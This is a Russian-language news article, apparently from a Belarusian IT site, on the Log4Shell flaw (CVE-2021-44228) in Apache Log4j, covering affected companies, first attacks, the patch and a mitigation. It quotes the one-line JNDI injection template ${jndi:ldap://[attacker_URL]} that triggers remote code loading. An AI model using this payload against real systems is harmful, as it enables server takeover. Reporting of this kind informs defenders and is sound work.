Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.

Оставить комментарий
Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Критическую уязвимость нулевого дня, получившую название Log4Shell, недавно обнаружили ИБ-специалисты Alibaba Cloud. При успешной эксплуатации злоумышленники могут запускать на целевом устройстве произвольный код, например внедрять вирусы-вымогатели и криптомайнеры, и получать контроль над атакуемыми серверами. Первые реальные атаки с её использованием Cisco и Cloudflare зафиксировали две недели назад 1 и 2 декабря.

Уязвимости присвоен код CVE-2021-44228 и максимальный уровень опасности по шкале CVSS. Она кроется в библиотеке Apache Log4j, которую используют для ведения логов миллионы Java-приложений.

Для атаки достаточно заставить приложение внести в журнал лишь одну строку кода в формате ${jndi:ldap://[attacker_URL]}, что позволит в дальнейшем интегрировать в него собственный код. В открытый доступ уже выложены рабочие эксплойты, а злоумышленники активно сканируют сеть в поисках уязвимых подключённых устройств. Эксперты по кибербезопасности ожидают, что в ближайшие дни атаки на подверженные системы участятся.

Уязвимость затрагивает Amazon, Apple, Steam, Minecraft, Tesla, Red Hat и множество других компаний, в софте которых используется библиотека. К примеру, в случае Minecraft взломать серверы и компьютеры геймеров можно, отправив сообщение с кодом в окно чата.

Особую серьёзность уязвимости придаёт то, насколько она проста в эксплуатации (атаку может осуществить даже неопытный хакер), насколько обширный контроль может обеспечить злоумышленнику и насколько вездесуща сама библиотека, поэтому потенциальный ущерб огромен.

Apache Foundation в прошлую пятницу выпустила патч и советует разработчикам обновить библиотеку до версии 2.15.0. Если сделать это нет возможности, рекомендуется перевести параметр log4j2.formatMsgNoLookups в значение true.

Подписывайтесь на «Что к чему» —
анамнез и главные симптомы беларуского ИТ.
Цифры, графика, ничего лишнего. Выходит раз в 2 недели.
Спасибо! На указанный адрес отправлено письмо для подтверждения подписки.
Читайте также
7 хороших курсов от Coursera по кибербезопасности
7 хороших курсов от Coursera по кибербезопасности
7 хороших курсов от Coursera по кибербезопасности
Собралb интересные курсы Coursera по информационной безопасности. В этой подборке есть курсы и для новичков, и для более продвинутых юзеров, которые хотят поднять свой уровень знаний или освежить изученное когда-то. 
В России двадцатикратный дефицит специалистов по кибербезопасности
В России двадцатикратный дефицит специалистов по кибербезопасности
В России двадцатикратный дефицит специалистов по кибербезопасности
Хакеры начинают искать и атаковать уязвимости уже через 15 минут после публикации данных о них
Хакеры начинают искать и атаковать уязвимости уже через 15 минут после публикации данных о них
Хакеры начинают искать и атаковать уязвимости уже через 15 минут после публикации данных о них
Microsoft обвинили в кибератаках «под чужим флагом» и создании ИТ-армии Украины
Microsoft обвинили в кибератаках «под чужим флагом» и создании ИТ-армии Украины
Microsoft обвинили в кибератаках «под чужим флагом» и создании ИТ-армии Украины

Хотите сообщить важную новость? Пишите в Telegram-бот

Главные события и полезные ссылки в нашем Telegram-канале

Обсуждение
Комментируйте без ограничений

Релоцировались? Теперь вы можете комментировать без верификации аккаунта.

Комментариев пока нет.